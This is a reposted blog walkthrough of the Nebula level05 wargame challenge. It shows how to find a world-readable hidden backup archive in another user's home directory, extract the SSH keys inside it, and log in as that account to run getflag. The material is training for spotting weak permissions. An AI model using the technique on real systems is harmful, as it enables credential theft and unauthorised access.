Nebula level05

最新推荐文章于 2017-02-26 21:27:08 发布

转载最新推荐文章于 2017-02-26 21:27:08 发布 · 7.4k 阅读

exploit 专栏收录该内容

26 篇文章

订阅专栏

本文介绍了一种利用弱文件权限获取SSH备份密钥的方法，并通过此方法成功登录目标账户的过程。通过查看隐藏目录及文件，发现了可读取的备份文件，从中提取SSH密钥，最终实现对目标系统的远程访问。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

http://exploit-exercises.com/nebula/level05

From the description we get one hint: weak permissions. And this is sufficient to easily solve this challenge.

First things first navigate to /home/flag05 and try to list its contents:

$ cd /home/flag05
$ ls
$

That’s odd. It looks like it’s empty. Let’s try to list *all*:

$ ls -al /home/flag05
total 36
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05 36 2013-02-26 15:46 .bash_history
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05 4096 2013-02-26 15:45 .cache
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 4096 2011-11-20 20:13 .ssh

Now, that’s better! Also it’s easy to make connection between initial hint and permissions for .ssh and .backup. Let’s see what’s in the .backup:

$ ls /home/flag05/.backup
total 12
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2013-02-26 15:45 ..
-rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz

So we have a backup archive which everyone can read. Copy that to home directory and see what’s there:

$ cp /home/flag05/.backup/backup-19072011.tgz ~/
$ tar -zxvf ~/backup-19072011.tgz
$ ls -al ~/
total 36
drwxr-x--- 4 level05 level05 4096 2013-02-26 15:46 .
drwxr-xr-x 43 root root 4096 2011-11-20 20:21 ..
-rw-rw-r-- 1 level05 level05 1826 2013-02-26 14:08 backup-19072011.tgz
-rw------- 1 level05 level05 705 2013-02-26 15:42 .bash_history
-rw-r--r-- 1 level05 level05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 level05 level05 4096 2013-02-26 13:48 .cache
-rw-r--r-- 1 level05 level05 675 2011-05-18 02:54 .profile
drwxr-xr-x 2 level05 level05 4096 2013-02-26 15:46 .ssh

We can see that we have obtained .ssh directory which contains keys for ssh; connecting this information with previous challenge we can try connecting to localhost as flag05 account:

$ ssh -l flag05 localhost
flag05@localhost$ getflag
You have successfully executed getflag on a target account

Easy-peasy.